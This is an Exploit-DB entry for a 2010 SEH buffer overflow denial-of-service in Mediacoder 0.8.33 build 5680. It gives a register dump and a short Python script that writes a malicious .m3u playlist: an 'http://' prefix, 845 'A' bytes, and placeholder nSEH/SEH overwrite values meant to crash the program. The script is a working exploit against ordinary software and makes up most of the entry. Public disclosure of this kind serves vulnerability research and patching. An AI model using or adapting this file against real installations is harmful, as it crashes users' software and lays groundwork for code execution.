Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS .m3u

2014-12-15T00:00:00
ID EDB-ID:35530
Type exploitdb
Reporter s-dz
Modified 2014-12-15T00:00:00

Description

Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.m3u). Dos exploit for windows platform

                    
                      # Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680

#  EAX 0012E508
#  ECX 43434343
#  EDX 00000000
#  EBX 43434343
#  ESP 0012E4A4
#  EBP 0012E4F4
#  ESI 0012E508
#  EDI 00000000

#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)

f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + junk)
f.close()